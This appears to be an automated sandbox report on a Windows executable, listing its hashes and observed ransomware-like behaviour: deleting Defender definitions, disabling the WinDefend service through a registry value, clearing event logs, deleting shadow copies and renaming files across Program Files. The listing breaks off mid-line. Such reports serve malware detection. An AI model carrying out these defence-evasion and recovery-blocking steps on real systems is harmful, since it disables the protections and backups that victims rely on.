Analysis
-
max time kernel
106s -
max time network
149s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
13-01-2022 10:00
Static task
static1
Behavioral task
behavioral1
Sample
69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
Resource
win10-en-20211208
General
-
Target
69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe
-
Size
3.6MB
-
MD5
5bd555b0d8e12806fbdbbcc3971b1f67
-
SHA1
2da4a3e94754c2f94b5f440a68ac0a3b979d3242
-
SHA256
69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d
-
SHA512
cc3f5199621435a1d04546a7446557378933ab9f42b5b638b8fbdf4805661ac38312d68801dd017fd1665cfe2a5d26c198b2cfd1b0193389c4891bc0e982e13c
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1800 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1552 bcdedit.exe 872 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Logos\Wide310x150\PaintWideTile.scale-400.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Audio\slide_in.wav 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_OAAAADgAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTest-pl.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Trial-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_OgAAADoAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarWideTile.scale-200.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-30_altform-unplated.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailBadge.scale-125.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_selected_18.svg.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_MAAAADAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_DAAAAAwAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlarmsSmallTile.contrast-black_scale-100.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\en-us\oregres.dll.mui.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_NgAAADYAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookMedTile.scale-100.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.targetsize-256.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\profilePic.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\es-es\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_LAAAACwAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\fr-FR\micaut.dll.mui.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_FgAAABYAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalDemoR_BypassTrial180-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_IgAAACIAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\LargeTile.scale-200.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\LargeTile.scale-200.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial1-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_EAAAABAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-200_contrast-high.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.sat4j.pb_2.3.5.v201404071733.jar.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AgAAAAIAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Retail-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\ar\msipc.dll.mui.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_IAAAACAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\AppxSignature.p7x 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7813_40x40x32.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxSmallTile.scale-150.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSmallTile.scale-200.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_BAAAAAQAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_Grace-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\5671_20x20x32.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text_2x.png.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremDemoR_BypassTrial365-ppd.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.scale-150.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_ZH-HK.respack 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\2_32x32x32.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_2015.7906.42257.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\ja-jp\ui-strings.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jni.h.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-white\Square44x44Logo.targetsize-256_altform-unplated.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSplashScreen.scale-100_contrast-black.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\_Resources\8.rsrc 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Generic-Light.scale-200.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\scanAppLogo.png.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_CgAAAAoAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\animations\OneNoteFRE_SaveAutomatically_LTR_Phone.mp4 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\LargeTile.scale-125.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\zh-hk_get.svg.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_PgAAAD4AAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_Retail-pl.xrm-ms.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AAAAAAAAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_MgAAADIAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Windows Media Player\ja-JP\wmplayer.exe.mui 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookLargeTile.scale-150.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\selector.js.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_NgAAADYAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailLargeTile.scale-400.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\ms_get.svg.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_AgAAAAIAAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c\SkypeApp\Assets\SkypeLargeTile.scale-125.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_TileLargeSquare.scale-100.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSmallTile.scale-200.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-white_targetsize-48.png 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad\osknumpadbase.xml 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.gnmD1UpHMMI-R4XHdrpXjZ10z97Tc984lKkQ9XMH3O3_PgAAAD4AAAA0.4ywda 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 1668 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exepid process 3464 powershell.exe 3464 powershell.exe 3464 powershell.exe 2252 powershell.exe 2252 powershell.exe 2252 powershell.exe 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 1984 wevtutil.exe Token: SeBackupPrivilege 1984 wevtutil.exe Token: SeSecurityPrivilege 2228 wevtutil.exe Token: SeBackupPrivilege 2228 wevtutil.exe Token: SeSecurityPrivilege 488 wevtutil.exe Token: SeBackupPrivilege 488 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1400 wmic.exe Token: SeSecurityPrivilege 1400 wmic.exe Token: SeTakeOwnershipPrivilege 1400 wmic.exe Token: SeLoadDriverPrivilege 1400 wmic.exe Token: SeSystemProfilePrivilege 1400 wmic.exe Token: SeSystemtimePrivilege 1400 wmic.exe Token: SeProfSingleProcessPrivilege 1400 wmic.exe Token: SeIncBasePriorityPrivilege 1400 wmic.exe Token: SeCreatePagefilePrivilege 1400 wmic.exe Token: SeBackupPrivilege 1400 wmic.exe Token: SeRestorePrivilege 1400 wmic.exe Token: SeShutdownPrivilege 1400 wmic.exe Token: SeDebugPrivilege 1400 wmic.exe Token: SeSystemEnvironmentPrivilege 1400 wmic.exe Token: SeRemoteShutdownPrivilege 1400 wmic.exe Token: SeUndockPrivilege 1400 wmic.exe Token: SeManageVolumePrivilege 1400 wmic.exe Token: 33 1400 wmic.exe Token: 34 1400 wmic.exe Token: 35 1400 wmic.exe Token: 36 1400 wmic.exe Token: SeIncreaseQuotaPrivilege 1108 wmic.exe Token: SeSecurityPrivilege 1108 wmic.exe Token: SeTakeOwnershipPrivilege 1108 wmic.exe Token: SeLoadDriverPrivilege 1108 wmic.exe Token: SeSystemProfilePrivilege 1108 wmic.exe Token: SeSystemtimePrivilege 1108 wmic.exe Token: SeProfSingleProcessPrivilege 1108 wmic.exe Token: SeIncBasePriorityPrivilege 1108 wmic.exe Token: SeCreatePagefilePrivilege 1108 wmic.exe Token: SeBackupPrivilege 1108 wmic.exe Token: SeRestorePrivilege 1108 wmic.exe Token: SeShutdownPrivilege 1108 wmic.exe Token: SeDebugPrivilege 1108 wmic.exe Token: SeSystemEnvironmentPrivilege 1108 wmic.exe Token: SeRemoteShutdownPrivilege 1108 wmic.exe Token: SeUndockPrivilege 1108 wmic.exe Token: SeManageVolumePrivilege 1108 wmic.exe Token: 33 1108 wmic.exe Token: 34 1108 wmic.exe Token: 35 1108 wmic.exe Token: 36 1108 wmic.exe Token: SeIncreaseQuotaPrivilege 1108 wmic.exe Token: SeSecurityPrivilege 1108 wmic.exe Token: SeTakeOwnershipPrivilege 1108 wmic.exe Token: SeLoadDriverPrivilege 1108 wmic.exe Token: SeSystemProfilePrivilege 1108 wmic.exe Token: SeSystemtimePrivilege 1108 wmic.exe Token: SeProfSingleProcessPrivilege 1108 wmic.exe Token: SeIncBasePriorityPrivilege 1108 wmic.exe Token: SeCreatePagefilePrivilege 1108 wmic.exe Token: SeBackupPrivilege 1108 wmic.exe Token: SeRestorePrivilege 1108 wmic.exe Token: SeShutdownPrivilege 1108 wmic.exe Token: SeDebugPrivilege 1108 wmic.exe Token: SeSystemEnvironmentPrivilege 1108 wmic.exe Token: SeRemoteShutdownPrivilege 1108 wmic.exe Token: SeUndockPrivilege 1108 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2060 wrote to memory of 1064 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 2060 wrote to memory of 1064 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1064 wrote to memory of 1192 1064 net.exe net1.exe PID 1064 wrote to memory of 1192 1064 net.exe net1.exe PID 2060 wrote to memory of 512 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 2060 wrote to memory of 512 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 512 wrote to memory of 3580 512 net.exe net1.exe PID 512 wrote to memory of 3580 512 net.exe net1.exe PID 2060 wrote to memory of 924 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 2060 wrote to memory of 924 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 924 wrote to memory of 1480 924 net.exe net1.exe PID 924 wrote to memory of 1480 924 net.exe net1.exe PID 2060 wrote to memory of 2080 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 2060 wrote to memory of 2080 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 2080 wrote to memory of 4044 2080 net.exe net1.exe PID 2080 wrote to memory of 4044 2080 net.exe net1.exe PID 2060 wrote to memory of 4020 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 2060 wrote to memory of 4020 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 4020 wrote to memory of 3416 4020 net.exe net1.exe PID 4020 wrote to memory of 3416 4020 net.exe net1.exe PID 2060 wrote to memory of 3216 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 2060 wrote to memory of 3216 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 3216 wrote to memory of 2448 3216 net.exe net1.exe PID 3216 wrote to memory of 2448 3216 net.exe net1.exe PID 2060 wrote to memory of 2836 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 2060 wrote to memory of 2836 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 2836 wrote to memory of 2380 2836 net.exe net1.exe PID 2836 wrote to memory of 2380 2836 net.exe net1.exe PID 2060 wrote to memory of 1060 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 2060 wrote to memory of 1060 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 1060 wrote to memory of 3244 1060 net.exe net1.exe PID 1060 wrote to memory of 3244 1060 net.exe net1.exe PID 2060 wrote to memory of 2176 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 2060 wrote to memory of 2176 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe net.exe PID 2176 wrote to memory of 3156 2176 net.exe net1.exe PID 2176 wrote to memory of 3156 2176 net.exe net1.exe PID 2060 wrote to memory of 4092 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 4092 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 736 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 736 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 592 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 592 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 1100 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 1100 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 944 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 944 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 2572 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 2572 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 1240 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 1240 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 2320 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 2320 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 1712 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote to memory of 1712 2060 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe sc.exe PID 2060 wrote 